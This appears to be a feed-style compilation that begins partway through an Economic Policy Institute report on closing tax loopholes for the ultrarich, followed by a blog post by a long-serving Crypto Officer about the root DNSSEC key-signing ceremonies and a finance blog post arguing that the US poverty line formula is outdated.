So, if children sold their stock gift for $501 per share, they would owe zero tax. And for the family as a whole, the entire (enormous) capital gain that occurred when the share appreciated from $1 to $501 is never taxed. This allows huge amounts of wealth to be passed down through families without the dynasty’s ever paying appropriate taxes, either capital gains taxes or estate taxes.

An obvious solution to this problem is simply to not grant the step-up in basis when the asset is transferred. That is, when the children receive the stock in the example above, any subsequent sale should be taxed on any capital gain calculated from the $1 originally paid for the stock. In the case above, the children would have had to pay a capital gains tax on the full value between $1 and $501 if they had sold the stock for $501.

Besides raising money directly through larger capital gains values, ending the step-up in basis can also cut down on many tax engineering strategies that wealthy families undertake to avoid taxation. Estimates for the revenue that could be raised by enacting this change are quite varied, but they tend to sit between $15 billion and $60 billion in 2025. 15 We estimate this would raise $190 billion over the next decade.

An alternative solution getting at the same problem would be to make the death of a wealth holder a realizable event. Essentially, for the purposes of taxation, it would be assumed that all assets were sold by a wealth holder upon their death, and the appropriate rate of capital gains taxation would then be collected.

Making borrowing a realizable event

A related reform would make the pledging of any asset as collateral against a loan a realizable event. In the example above, as the original holder of the stock held the shares and did not sell them over a long period of time, this raises an obvious question of how this family is financing their current consumption without liquidating any wealth. They could, of course, be earning labor income. But the very wealthy often finance current consumption by taking out loans and using the value of their wealth as collateral. So long as the interest rates on the loans are lower than the rate of return on the wealth being pledged as collateral, they can enjoy high and rising consumption and still see considerable wealth appreciation. This is a particularly useful strategy during periods of low interest rates (like most of the past 25 years) and for owners of newer corporations that are growing rapidly (think Jeff Bezos and Amazon during the 2000s). This use of debt as a strategy of avoiding capital gains realization has often been called the “Buy, Borrow, Die” strategy.

An obvious reform to stop this would be to force wealth holders to treat pledging an asset as collateral as a realization event for this asset. When the wealth holder goes to financiers to get loans and pledges their shares as collateral, the wealth holder would pay a capital gains tax on the difference in the value of the stock between when they originally bought it and the value the day it is pledged for collateral. The amount of revenue this would raise would be small in the grand scheme of the federal budget, roughly $60 billion over the next decade. But it would provide one more block to a common tax evasion strategy for the ultrarich, and this could show up in more revenue collected through other taxes.

Closing loopholes that erode estate or inheritance tax bases

Hemel and Lord (2021) identify estate planning mechanisms that reduce the base of the current estates taxes, including the abuse of grantor retained annuity trusts (GRATs) and excessively preferential tax treatment of transfers within family-controlled entities. Under current law, wealthy individuals establishing a trust for their descendants may calculate the taxable gift amount of the trust by subtracting the value of any qualified interest. This qualified interest includes any term annuity retained by the grantor of the trust. The annuity is based on market interest rates prevailing when the trust was established. When interest rates are low, this becomes an extremely valuable deduction.

Hemel and Lord (2021) give the example of a grantor establishing a $100 billion trust but retaining a two-year annuity payment of $50.9 million based on the 1.2% interest rate prevailing in 2021. This taxpayer would be able to subtract this annuity from their taxable gift calculation, effectively paying no gift tax. If the assets in the trust grew faster than 1.2%, then the trust would have assets left over after two years, and these could be passed to the beneficiaries free of any transfer tax (as these assets came from the trust, not the original grantor). If assets in the trust grew more slowly than this amount, then the trust would be unable to make its full final annuity payment and would be declared a failed trust and would trigger no estate or gift tax consequences. In this case, the original grantor could simply try again to construct a short-term irrevocable trust that would succeed in transferring income to heirs without triggering a gift tax.

Hemel and Lord (2021) recommend repealing the law that allows for this deduction of qualified interest from gift or transfer taxes applying to GRATs. They also argue for reducing the preferential treatment of transfers within family-controlled entities. The full package of reforms to estate planning that they recommend would raise $90 billion over the next decade.

Closing the loophole from ambiguity between self-employment and net investment income

As part of the Affordable Care Act, a 3.8% tax was assessed on income above $200,000 (for single filers and $250,000 for joint filers). If this income is earned as wages or self-employment income, this tax is paid through the Federal Insurance Contributions Act (FICA) or the Self-Employment Contributions Act (SECA) taxes. If the income is received as a dividend or interest payment or royalty or other form of investment income, the tax is paid as a Net Investment Income Tax (NIIT). The clear intent is for income of all forms to be assessed this tax.

Somehow, however, some business owners (mostly those owning limited partnerships and S corporations—corporations with a limited number of shareholders who are required to pass through all profits immediately to owners) have managed to classify their income as not subject to FICA, SECA, or the NIIT. 16 A number of policy options could close this unintended gap and raise nontrivial amounts of revenue—roughly $25 billion in 2025. Importantly, the revenue collected by this loophole closing would go directly to the Medicare trust fund.

International corporate tax reform

Before the TCJA, the biggest loophole by far in the corporate income tax code was U.S. corporations’ ability to defer taxes paid on profits earned outside the United States. In theory, once these profits were repatriated, taxes would be levied on them. However, financial engineering meant that there was little need to repatriate these profits for reasons of undertaking investment or stock buybacks or anything else corporations wanted to do. 17 Further, corporations routinely lobbied for repatriation holidays, periods of time when they were allowed to repatriate profits at a reduced rate. One such holiday was passed by Congress and signed into law by George W. Bush in 2004.

Between 2004 and 2017, pressure for another such holiday ramped up as more and more firms deferred corporate taxes by holding profits offshore. The TCJA not only provided such a holiday for past profits kept offshore, it also made profits booked overseas mostly exempt from U.S. corporate taxes going forward. In essence, the TCJA turned deferral into an exemption.

This TCJA exemption of foreign-booked profits was subject to small bits of tax base protection. But they have been largely ineffective. The 2025 budget reconciliation bill would further exacerbate these problems, reducing taxes on foreign income even more.

Clausing and Sarin (2023) recommend a suite of corporate reforms that aims to level the playing field between firms booking profits in the United States versus overseas. Key among them would be to reform the Global Intangible Low-Taxed Income (GILTI) tax rate, a rate introduced in the TCJA, to ensure that financial engineering would not allow large amounts of corporate income earned by U.S.-based multinationals to appear as if they were earned in tax havens. 18

The GILTI is essentially a global minimum tax rate for U.S. multinationals. But the rate (10.5% in 2024 and 12.6% in 2025) is far too low to effectively stop this kind of tax haven-shopping for corporations, much lower than the 15% minimum rate negotiated by the OECD and agreed to by the Biden administration in 2022.

In addition, multinationals are currently allowed to blend all their foreign tax obligations globally and take credits for foreign corporate income taxes paid. So, taxes paid on a company’s actual manufacturing plant in, say, Canada, can count toward the GILTI contribution of a multinational, even if they then used financial engineering to shift most of their paper profits to tax havens like the Cayman Islands.

Raising the GILTI rate and applying it on a country-by-country basis would go a long way to preserving the base of the U.S. corporate income tax in the face of tax havens. The Clausing and Sarin (2023) suite of reforms would raise $42 billion in 2025.

Building up IRS enforcement capabilities and mandates

In 2022, the IRS estimated that the tax gap (the dollar value of taxes legally owed but not paid in that year) exceeded $600 billion. The richest households account for the large majority of this gap. The IRS in recent decades has lacked both the resources and the political support to properly enforce the nation’s tax laws and collect the revenue the richest households owe the country.

Due to this lack of resources and mandates, the IRS instead often took the perverse approach of leveraging enforcement against easy cases—easy both in terms of not taking much capacity and of not generating intense congressional backlash. 19 In practice, this meant intensively auditing recipients of refundable tax credits to look for improper payments. Tax credits are refundable when the amount of a credit (say, the Child Tax Credit) is larger than the taxpayer’s entire income tax liability. In this case, the credit does not just reduce income tax liability; it will also result in an outright payment (hence, refundable) to the taxpayer claiming it. Recipients of these refundable tax credits are, by definition, low-income taxpayers—those with low income tax liability. Besides making the lives of these low-income households more anxious, these audits also just failed to generate much revenue—again, because the group being audited was generally low income and didn’t owe significant taxes in the first place.

The Biden administration included significant new money to boost IRS enforcement capacity as part of the 2022 Inflation Reduction Act (IRA). This extra enforcement capacity was paired with new mandates to reduce the tax gap by increasing enforcement efforts on rich taxpayers.

However, the IRA additions to IRS resources were already being chiseled away before the 2024 presidential election. The Trump administration clearly has no interest in whether or not the IRS consistently enforces revenue collection from the rich. The budget reconciliation bill that Republicans passed through Congress in July rolled back the expanded funding for IRS enforcement. Trump’s proposed fiscal year 2026 budget for IRS funding would chip away at that even further.

The IRS has also not been immune to the Trump administration’s attempt to make life miserable for federal employees. The agency has lost a quarter of its workforce since 2025 to layoffs, the deferred resignation offer pushed by Elon Musk’s so-called Department of Government Efficiency, early retirements, and other separations (TIGTA 2025).

The sharp turn away from the Biden administration’s support of the IRS represents a missed opportunity. While it would be near impossible to fully close the tax gap, Sarin and Summers (2019) estimate that some modest and doable steps could reliably collect significantly over $100 billion per year over the next decade from increased enforcement efforts.

How much could a campaign of confidence-building measures to tax the ultrarich raise?

These measures to enact a series of tax reforms laser-targeted at only the rich could raise significant revenue. One obvious benchmark suggests itself: the current fiscal gap. The fiscal gap is how much (as a share of GDP) taxes would need to be raised or spending would need to be cut to stabilize the ratio of public debt to GDP. Today this gap stands at roughly 2.2%.

Table 1 gives a rough score for each of the provisions mentioned above. It then conservatively estimates the combined revenue-raising potential of this package. It assumes that the whole policy package is equal to 70% of the sum of its parts. This would help account for some fiscal “externalities” (i.e., taxing wealth means wealth grows more slowly over time and, hence, reduces tax collections on income earned from wealth going forward). It also would help account for some potentially duplicative effects that could reduce some revenue collected by the combination of these reforms. For example, if the step-up in basis were eliminated, the incentive for rich households to finance consumption with loans would be reduced, so the revenue generated by treating the pledging of collateral as a realizable event would likely be reduced.

This combination of confidence-building measures to tax the rich would unambiguously be able to close the nation’s current fiscal gap. The sum of the parts of this agenda would raise roughly 4% of GDP over the long run, and even if the sharp 30% discount on the sum of these parts was applied, it is still just under 3% of GDP. Telling the American public that this package of tax increases on the ultrarich had put the nation on a fully sustainable long-run trajectory while still leaving enough money to fund something as large as universal pre-K for 3- and 4-year-olds or a radical increase in more generous coverage in the nation’s unemployment insurance system could be seismic for changing the tax debate in the United States.

For those like us who advocate for even larger expansions of the U.S. system of income support, social insurance, and public investment, the future political debate over how to finance them would be on much more favorable ground with the public’s support. The conditions of the debate would change if the public could shake the (too often true) impression that the U.S. government is failing to ask the ultrarich and corporations to do their part to contribute to the nation’s fiscal needs.

Conclusion

Obviously, this program of laser-targeting tax increases on the ultrarich is not the policy of the current Trump administration or the Republican majority in Congress. They have already spent the first half of 2025 forcing through a monster of a reconciliation bill, which extended the expiring provisions of the TCJA, provisions that provide disproportionate benefits to the very rich. The reconciliation bill represents a shocking upward redistribution of income from the very poor to the very rich, paying for trillions of dollars in tax cuts that primarily benefit the wealthy by stripping health care and food assistance from millions of Americans.

But as damaging as extending these expiring provisions will be to tax fairness and economic outcomes, they might be even more damaging to the public’s confidence that tax policy can ever be reoriented to ensure that the ultrarich and corporations pay their fair share. Instead, the debate over the expiring provisions will draw attention to two facts. First, the large majority of U.S. households will see a tax cut (relative to current law), but these cuts will be much larger for the rich. For example, the bottom 60% of households will see a tax cut of just over $1 per day, while the top 1% will see a cut of $165 per day, and the top 0.1% will see a whopping $860 per day. Second, these regressive tax cuts are bundled with spending cuts that will sharply reduce incomes for the people in the bottom half of the income distribution, leaving them net losers overall.

This combination of facts will continue to feed perceptions that the only way typical households can get something—anything—out of tax policy debates is if they settle for crumbs from the feast enjoyed by the richest. And even these crumbs will be taken back in the form of cuts elsewhere.

It’s time to reverse these perceptions. If policymakers engage in a confidence-building set of measures to raise significant revenue only from the ultrarich, the public’s stance toward tax policy can be changed from being anti-tax to being willing to have debates about the pros and cons of public sector expansions, content in the knowledge that the very rich will neither escape their obligations nor claim the lion’s share of benefits yet again.

Notes

1. Obviously not all of this downward ratchet is bad. The steep decline in tax rates for the poorest families, driven by expanding Earned Income and Child Tax credits, has been a very welcome policy development in recent decades.

2. The strong relationship between the level of gross domestic product (GDP) per capita and the share of the public sector in a nation’s economy is recognized enough to have been named: Wagner’s Law.

3. On the relative smallness of the U.S. fiscal state (both spending and taxation as shares of GDP), see EPI 2025.

4. Bivens and Mishel 2021 note the number of intentional policy changes outside the sphere of taxation that have driven much of the growth in pre-tax inequality.

5. For example, both the Affordable Care Act (ACA) and the Inflation Reduction Act (IRA) paid for the additional spending on public investments and income support programs they called for with new taxes. That said, because Republican-driven tax cuts were passed in the interim, the upshot has been mostly larger budget deficits over time.

6. See Kogan and Vela 2024 for an explanation and estimation of the U.S. fiscal gap in 2024.

7. The rate of return assumption matters a lot for how durable revenue increases from a wealth tax will be over time. A rate of 8.5% is on the high end of many projections for rates of return to wealth in coming decades.

8. Specifically, they note about wealth taxes: “Set the rates medium (2%–3%) and you get revenue for a long time and deconcentration eventually” (Saez and Zucman 2019b). When they estimate the potential revenue of Elizabeth Warren’s 2% wealth tax on estates over $50 million (with an additional tax of 1% on wealth over a billion), they find it raises roughly 1% of GDP per year (Saez and Zucman 2019a).

9. This estimate comes from the Penn Wharton Budget Model 2022.

10. For a description of that surtax and the competing revenue options debated at the time, see Bivens and Gould 2009.

11. This number has been inflated to 2024 dollars.

12. See Gardner et al. 2024 on the effective corporate income tax rate before and after the TCJA.

13. For example, the Distributional Financial Accounts of the Federal Reserve Board (2025) estimate that the wealthiest 1% of households own over 30% of corporate equities, while the wealthiest 10% own just under 90%.

14. See Sarin and Summers 2019 for how much of the tax gap is driven by poor reporting requirements on income flows disproportionately earned by the rich—mostly various forms of noncorporate business income.

15. This range of estimates comes from the Joint Committee on Taxation (JCT) 2023, and Lautz and Hernandez 2024. Part of this variation is about how much extra revenue is allocated to the strict step-up in basis termination versus the extra revenue that is collected through the normal capital gains tax as a result of closing this loophole.

16. The details of this gap can be found in Office of Tax Analysis 2016. The upshot is that some business owners have managed to deny being active managers of their firms and have, hence, avoided being taxed on labor earnings, but they have somehow also managed to deny being passive owners of their firms, hence avoiding the NIIT as well. It is bizarre that this not-active but not-passive category of owner has been allowed to be given legal status, but that does seem to be the state of the law currently, until Congress acts.

17. See Bivens 2016 on how profits held abroad by deferring taxation were not a constraint on any meaningful economic activity.

18. I say “appear” because the ability and even the specific strategies corporations have to make profits clearly earned by sales in the United States appear on paper to have been earned in tax havens are all extremely well documented by now, including in Zucman 2015.

19. See Elzayn et al. 2023 for evidence that the audit patterns of the IRS in the mid-2010s were driven by these considerations.

References

Batchelder, Lily. 2020 . Leveling the Playing Field Between Inherited Income and Income from Work Through an Inheritance Tax . The Hamilton Project, The Brookings Institution, January 28, 2020.

Bivens, Josh. 2016. “ Freeing Corporate Profits from Their Fair Share of Taxes Is Not the Deal America Needs .” Working Economics Blog (Economic Policy Institute), September 27, 2016.

Bivens, Josh, and Elise Gould. 2009. House Health Care Bill Is Right on the Money: Taxing High Incomes Is Better Than Taxing High Premiums . Economic Policy Institute, December 2009.

Bivens, Josh, and Lawrence Mishel. 2021. Identifying the Policy Levers Generating Wage Suppression and Wage Inequality . Economic Policy Institute, May 2021.

Brun, Lidía, Ignacio González, and Juan Antonio Montecino. 2025. “ Corporate Taxation and Market Power Wealth .” Working Paper, Institute for Macroeconomic Policy Analysis (IMPA), February 12, 2025.

Clausing, Kimberly A., and Natasha Sarin. 2023. The Coming Fiscal Cliff: A Blueprint for Tax Reform in 2025 . The Hamilton Project, The Brookings Institution, September 2023.

Economic Policy Institute (EPI). 2025. U.S. Tax and Spending Explorer .

Elazyn, Hadi, Evelyn Smith, Thomas Hertz, Arun Ramesh, Robin Fisher, Daniel E. Ho, and Jacob Goldin. 2023. “ Measuring and Mitigating Racial Disparities in Tax Audits .” Stanford Institute for Economic Policy Research (SIEPR) Working Paper, January 2023.

Federal Reserve Board. 2025. Distributional Financial Accounts of the United States . Accessed April 2025.

Gardner, Matthew, Michael Ettlinger, Steve Wamhoff, and Spandan Marasini. 2024. Corporate Taxes Before and After the Trump Tax Law . Institute on Taxation and Economic Policy (ITEP), May 2, 2024.

Greenwald, Daniel L., Martin Lettau, and Sydney C. Ludvigson. 2025. “ How the Wealth Was Won: Factor Shares as Market Fundamentals .” Journal of Political Economy 133, no. 4 (April): 1083–1132.

Hemel, Daniel, and Robert Lord. 2021. “ Closing Gaps in the Estate and Gift Tax Base .” Working Paper, Coase-Sandor Working Paper Series in Law and Economics. University of Chicago Law School, August 13, 2021.

Joint Committee on Taxation (JCT). 2023. Estimates of Federal Tax Expenditures for Fiscal Years 2023–2027 . JCX-59-23, December 7, 2023.

Kogan, Bobby, and Jessica Vela. 2024. What Would It Take to Stabilize the Debt-to-GDP Ratio? Center for American Progress, June 5, 2024.

Lautz, Andrew, and Fredrick Hernandez. 2024. Paying the 2025 Tax Bill: Step Up in Basis and Securities-Backed Lines of Credit . Bipartisan Policy Center, December 12, 2024.

Office of Tax Analysis. 2016. Gaps Between the Net Investment Income Tax Base and the Employment Tax Base , April 14, 2016.

Page, Benjamin I., Larry M. Bartels, and Jason Seawright. 2013. “ Democracy and the Policy Preferences of Wealthy Americans .” Perspectives on Politics 11, no. 1 (March): 51–73.

Penn Wharton Budget Model. 2022. Decomposing the Decline in Estate Tax Liability Since 2000 , University of Pennsylvania, July 28, 2022.

Rau, Eli G., and Susan Stokes. 2024. “ Income Inequality and the Erosion of Democracy in the Twenty-First Century .” PNAS 122, no. 1, December 30, 2024.

Saez, Emmanuel, and Gabriel Zucman. 2019a. “ Policy Memo on Wealth Taxes ,” September 22, 2019.

Saez, Emmanuel, and Gabriel Zucman. 2019b. Progressive Wealth Taxation . Brookings Papers on Economic Activity, Fall 2019.

Sarin, Natasha, and Lawrence H. Summers. 2019. “ Shrinking the Tax Gap: Approaches and Revenue Potential .” National Bureau of Economic Research (NBER) Working Paper no. 26475, November 2019.

Tax Policy Center (TPC). 2025. Revenue Estimate of Wealth Tax Proposal from Why Not Initiative.

Treasury Inspector General for Tax Administration (TIGTA). 2025. Snapshot Report: IRS Workforce Reductions as of May 2025 . Report Number 2025-IE-R027. July 18, 2025.

Williamson, Vanessa S. 2017. Read My Lips: Why Americans Are Proud to Pay Taxes . Princeton, N.J.: Princeton Univ. Press, March 2017.

Zucman, Gabriel. 2015. The Hidden Wealth of Nations: The Scourge of Tax Havens . Translated by Teresa Lavender Fagan. Foreword by Thomas Piketty. Univ. of Chicago Press.


See related work on Wealth | Taxes | Congress | Public office, private gain

See more work by Josh Bivens


Josh Bivens is the chief economist at the Economic Policy Institute (EPI). His areas of research include macroeconomics, inequality, social insurance, public investment, and the economics of globalization.

Bivens has written extensively for both professional and public audiences, with his work appearing in peer-reviewed academic journals (like the Journal of Economic Perspectives) and edited volumes (like The Handbook of the Political Economy of Financial Crises from Oxford University Press), as well as in popular print outlets (like USA Today, the Wall Street Journal and the New York Times).

Bivens is the author of Failure by Design: The Story behind America’s Broken Economy (EPI and Cornell University Press) and Everybody Wins Except for Most of Us: What Economics Really Teaches About Globalization (EPI), and is a co-author of The State of Working America, 12th Edition (EPI and Cornell University Press).

Bivens has provided expert insight to a range of institutions and media, including formally testifying numerous times before committees of the U.S. Congress.

Before coming to EPI, he was an assistant professor of economics at Roosevelt University. He has a Ph.D. in economics from the New School for Social Research and a bachelor’s degree from the University of Maryland at College Park.

The Economic Policy Institute’s vision is an economy that is just and strong, sustainable, and equitable — where every job is good, every worker can join a union, and every family and community can thrive.
About EPI. The Economic Policy Institute (EPI) is a nonprofit, nonpartisan think tank working for the last 30 years to counter rising inequality, low wages and weak benefits for working people, slower economic growth, unacceptable employment conditions, and a widening racial wage gap. We intentionally center low- and middle-income working families in economic policy discussions at the federal, state, and local levels as we fight for a world where every worker has access to a good job with fair pay, affordable health care, retirement security, and a union.

We also know that research on its own is not enough—that’s why we intentionally pair our research with effective outreach and advocacy efforts as we fight to make concrete change in everyday people’s lives.

The Economic Policy Institute’s vision is for all workers to share equally in the economic prosperity of our country. Our research exposes the forces that seek to exclude and diminish the power of people of color and women—particularly Black, Brown, and indigenous people—to the benefit of white supremacy and wealthy elites. We recognize the economic legacy of anti-Blackness; slavery; colonialization; oppressive policies, practices, and institutions; and the persistence of structural racism, sexism, and xenophobia today. Therefore, our vision elevates the importance of racial, gender, and worker justice as central to the world we want to see.

Passing the Torch – My Last Root DNSSEC KSK Ceremony as Crypto Officer 4

Hacker News
technotes.seastrom.com
2025-11-24 02:16:42
Comments...
Original Article

Many years ago, when I was but an infant, the first computers were connected on the ARPANET - the seminal computer network that would eventually evolve to become the Internet. Computers at the time were large and expensive; indeed the first version of NCP - the predecessor of TCP/IP - only countenanced roughly 250 computers on the network.

The name (human friendly) to network address (computer friendly) mapping on this network was maintained via a "hosts file" - literally a flat file of ordered pairs, creating the connection between host (computer) name and address.

So it continued as computers got less expensive and proliferated, the Network Effect caused more institutions to want to be connected to the ARPANET. TCP/IP was developed in response to this, with support for orders of magnitude more connected computers. Along the way, the military users of the network got carved off into its own network, and by the early 1980s we had the beginnings of the Internet, or a "catenet" as it was sometimes called at the time - a network of networks.

Clearly, as we went from "a couple hundred computers" to "capacity for billions", a centrally managed host file wasn't going to scale, and by the early 1980s development had started on a distributed database to replace the centrally managed file. The name for this distributed database was the Domain Name System, or DNS.

It's important to realize that at the time, access to the network of networks was still restricted to a chosen few - higher education, research institutions, military organizations and the military-industrial complex (ARPA, later DARPA, was, after all, an activity of the United States Department of Defense), and a few companies that were tightly associated with one or more of those constituencies. Broad public commercial access to the Internet was many years in the future.

It was in this environment that the DNS sprang forth. Academics, military researchers, university students - a pretty collegial environment. Not to mention paleo-cybersecurity practices - indeed the word "cybersecurity" may not have even been coined yet, though the notion of "computer security" dates back to the early 1970s.

I've mentioned this brief "history of the early Internet" to preemptively answer the question which inevitably arises: why didn't DNS have better security built in? The answer is twofold: firstly it didn't have to based on the environment that it evolved in, and secondly, even if it had, the security practices would have been firmly rooted in 1980s best practices, which would certainly be inadequate by modern standards.

Discovery of security flaws in 1990 led the IETF to begin development on Domain Name System Security Extensions (DNSSEC) in 1995. Early versions were difficult to deploy. Later versions improved somewhat. But inertia is a thing, the status quo tends to prevail, and there was very real concern that DNSSEC would be a net reliability minus (security vs. availability can be a tricky circle to square), concentrate power in undesirable ways, and result in other unforeseen negative effects.

At the end of the day, as it so often does, it took a crisis to get the ball rolling for real. In 2008, Dan Kaminsky discovered a fundamental flaw in DNS, which simplified cache poisoning - essentially making it possible for an attacker to misdirect users to arbitrary web sites.

In less than two years, the DNS root would be cryptographically signed - allowing those who wished to sign their domains as well to create a cryptographic chain of trust authenticating their DNS lookups. This is non-repudiation, not non-disclosure - DNS queries and responses continued to happen in the clear. But this time, responses came back with a digital signature, courtesy of DNSSEC.

David Huberman at ICANN did a splendid slide deck explaining how it all works .

Trust in a system requires more than technical correctness. It involves trust in the execution of running the system itself. For that reason ICANN decided that it would build a framework to facilitate trust and transparency. Among other things it included:

  • Placing the cryptographic material in two highly secure sites, one near Washington DC and one in Los Angeles (geographic diversity)
  • Creating a multi-layered security regimen requiring several people to access the Key Management Facility
  • Storing cryptographic material in offline HSMs which utilize Shamir's Secret Sharing to require a quorum of at least 3 out of 7 Crypto Officers to be present in order to "wake them up"
  • Trusted Community Representatives with roles of Crypto Officer and Recovery Key Share Holder
  • Highly scripted (and therefore auditable) ceremonies surrounding handling the cryptographc material
  • Live streaming all events
  • Hosting External Witnesses from the community who have expressed interest in being present for a ceremony in person

When the call for volunteers to be Trusted Community Representatives came out, I was no stranger to community involvement, having served several years on the ARIN Advisory Council and done community work (and later Board work) for NANOG. I was employed by a Top Level Domain operator, and submitted my CV and expressed my interest.

That's how I found myself in Culpeper, Virginia in 2010 as Crypto Officer 4 at the first ceremony for signing the DNSSEC Root. I had no idea that I would still be doing it fifteen years later. I was the last of the original Crypto Officers for KMF-East, and the second last overall - outlasted only by Subramanian "SM" Moonesamy, who is Crypto Officer 7 for KMF-West.

It's been an adventure. I've been a small participant in root key rolls, put in a B-roll appearance on BBC Horizon (S53E13), become friends with many of the people I served with, overseen ceremonies remotely during the COVID lockdown, and witnessed an amazing pivot by ICANN staff who managed to get new HSMs selected, tested, integrated, and deployed on only 8 months' notice, a feat which I remain in awe of.

I was an early advocate for improving trust in our process by leveraging natural turnover and backfilling existing TCRs with people selected from a broader set of qualified individuals than just the fellowship of DNS protocol experts, operators, and developers. I'm grateful that our voices were heard.

On November 13th 2025, I passed the torch to Lodrina Cherne who is now Crypto Officer 4 for KMF-East. Lodrina is a security researcher, an educator with an emphasis on digital forensics, and works in security engineering at a large cloud provider. I'm honored to have her as my successor.

I've had several people reach out to me to ask what prompted me to step back from the ICANN volunteer work. Those who were hoping for some kind of salacious dirt or scandal were sorely disappointed - quite the opposite, this is a huge success story and I'm pleased to have been able to do my small part. A direct cut and paste from Slack logs with one of them follows:

What led you to step back from ICANN?

Several things:

  • It was understood to be a 5 year commitment. I've been doing it for more than 15.
  • It was broadly agreed among the cohort many years ago (over a decade ago) that more people from more diverse backgrounds than just DNS-old-boy-network (which was the original group of TCRs) was a Good Thing.
  • Many people cycled out earlier; I was happy to let the folks for whom travel was more odious go first. But it's only practical and only really good for the system to cycle out a single TCR per ceremony.
  • COVID delayed this. Kaminsky's untimely death and subsequent replacement as a recovery key shareholder (RKSH) delayed this.
  • A further delay was the AEP Keyper HSM getting abruptly EOLed, and the transition to the Thales Luna HSMs. It went off without a hitch after being researched, developed, and executed in 8 months - a record which I stand in awe of and which is a true testament to the skill and commitment of the ICANN PTI team. ICANN expressed the desire for continuity among long-serving COs past that milestone; Frederico Neves (fellow original Crypto Officer) and I were willing to extend our stay for that.

So in short it was time to pass the torch. Everyone has been doing everything right. I remarked at the end of the Ceremony 59 that when we started doing this 15 years ago, success was not guaranteed; it took the Kaminsky bug to get us over the line to actually deploy it. Today, the major Unix DNS resolvers ship with DNSSEC validation enabled. All of the major public DNS resolvers (google, quad9, cloudflare) do DNSSEC validation. I thanked everyone who has been responsible for and put their personal credibility on the line for the security, integrity, and credibility of this process and stated that I was honored to have been able to play a small part in doing that.

Epilogue:

I won't be participating in most East Coast ceremonies from here on out, but I don't rule out occasionally showing up as an external witness, particularly at KMF-West where I have never visited in person.

Here scans of our ceremony scripts from both Ceremony 59 and the previous day's administrative ceremonies.

Root DNSSEC KSK Ceremony 59

Root DNSSEC KSK Administrative Ceremony 59 Backup HSM Acceptance Testing

Root DNSSEC KSK Administrative Ceremony 59 Safe #2 Credentiais Safe Deposit Box Lock Assembly Programming

kskm-ksrsigner-logs.pdf

My Life Is a Lie: How a Broken Benchmark Broke America

Hacker News
www.yesigiveafig.com
2025-11-24 02:05:01
Comments...
Original Article

We’re going to largely skip markets again, because the sweater is rapidly unraveling in other areas as I pull on threads. Suffice it to say that the market is LARGELY unfolding as I had expected — credit stress is rising, particularly in the tech sector. Many are now pointing to the rising CDS for Oracle as the deterioration in “AI” balance sheets accelerates. CDS was also JUST introduced for META — it traded at 56, slightly worse than the aggregate IG CDS at 54.5 (itself up from 46 since I began discussing this topic):

Correlations are spiking as MOST stocks move in the same direction each day even as megacap tech continues to define the market aggregates:

Market pricing of correlation is beginning to pick up… remember this is the “real” fear index and the moving averages are trending upwards:

And, as I predicted, inflation concerns, notably absent from any market-based indication, are again freezing the Fed. The pilots are frozen, understanding that they are in Zugzwang — every choice has unfavorable options.

And so now, let’s tug on that loose thread… I’m sure many of my left-leaning readers will say, “This is obvious, we have been talking about it for YEARS!” Yes, many of you have; but you were using language of emotion (“Pay a living wage!”) rather than showing the math. My bad for not paying closer attention; your bad for not showing your work or coming up with workable solutions. Let’s rectify it rather than cast blame.

I have spent my career distrusting the obvious.

Markets, liquidity, factor models—none of these ever felt self-evident to me. Markets are mechanisms of price clearing. Mechanisms have parameters. Parameters distort outcomes. This is the lens through which I learned to see everything: find the parameter, find the distortion, find the opportunity.

But there was one number I had somehow never interrogated. One number that I simply accepted, the way a child accepts gravity.

The poverty line.

I don’t know why. It seemed apolitical, an actuarial fact calculated by serious people in government offices. A line someone else drew decades ago that we use to define who is “poor,” who is “middle class,” and who deserves help. It was infrastructure—invisible, unquestioned, foundational.

This week, while trying to understand why the American middle class feels poorer each year despite healthy GDP growth and low unemployment, I came across a sentence buried in a research paper:

“The U.S. poverty line is calculated as three times the cost of a minimum food diet in 1963, adjusted for inflation.”

I read it again. Three times the minimum food budget.

I felt sick.

The formula was developed by Mollie Orshansky, an economist at the Social Security Administration. In 1963, she observed that families spent roughly one-third of their income on groceries. Since pricing data was hard to come by for many items, e.g. housing, if you could calculate a minimum adequate food budget at the grocery store, you could multiply by three and establish a poverty line.

Orshansky was careful about what she was measuring. In her January 1965 article, she presented the poverty thresholds as a measure of income inadequacy , not income adequacy—”if it is not possible to state unequivocally ‘how much is enough,’ it should be possible to assert with confidence how much, on average, is too little.”

She was drawing a floor. A line below which families were clearly in crisis.

For 1963, that floor made sense. Housing was relatively cheap. A family could rent a decent apartment or buy a home on a single income, as we’ve discussed. Healthcare was provided by employers and cost relatively little (Blue Cross coverage averaged $10/month). Childcare didn’t really exist as a market—mothers stayed home, family helped, or neighbors (who likely had someone home) watched each other’s kids. Cars were affordable, if prone to breakdowns. With few luxury frills, the neighborhood kids in vo-tech could fix most problems when they did. College tuition could be covered with a summer job. Retirement meant a pension income, not a pile of 401(k) assets you had to fund yourself.

Orshansky’s food-times-three formula was crude, but as a crisis threshold—a measure of “too little”—it roughly corresponded to reality. A family spending one-third of its income on food would spend the other two-thirds on everything else, and those proportions more or less worked. Below that line, you were in genuine crisis. Above it, you had a fighting chance.

But everything changed between 1963 and 2024.

Housing costs exploded. Healthcare became the largest household expense for many families. Employer coverage shrank while deductibles grew. Childcare became a market, and that market became ruinously expensive. College went from affordable to crippling. Transportation costs rose as cities sprawled and public transit withered under government neglect.

The labor model shifted. A second income became mandatory to maintain the standard of living that one income formerly provided. But a second income meant childcare became mandatory, which meant two cars became mandatory. Or maybe you’d simply be “asking for a lot generationally speaking” because living near your parents helps to defray those childcare costs.

The composition of household spending transformed completely. In 2024, food-at-home is no longer 33% of household spending. For most families, it’s 5 to 7 percent.

Housing now consumes 35 to 45 percent. Healthcare takes 15 to 25 percent. Childcare, for families with young children, can eat 20 to 40 percent.

If you keep Orshansky’s logic—if you maintain her principle that poverty could be defined by the inverse of food’s budget share—but update the food share to reflect today’s reality, the multiplier is no longer three.

It becomes sixteen.

Which means if you measured income inadequacy today the way Orshansky measured it in 1963, the threshold for a family of four wouldn’t be $31,200.

It would be somewhere between $130,000 and $150,000.

And remember: Orshansky was only trying to define “too little.” She was identifying crisis, not sufficiency. If the crisis threshold—the floor below which families cannot function—is honestly updated to current spending patterns, it lands at $140,000.

What does that tell you about the $31,200 line we still use?

It tells you we are measuring starvation.

“An imbalance between rich and poor is the oldest and most fatal ailment of all republics.” — Plutarch

The official poverty line for a family of four in 2024 is $31,200. The median household income is roughly $80,000. We have been told, implicitly, that a family earning $80,000 is doing fine—safely above poverty, solidly middle class, perhaps comfortable.

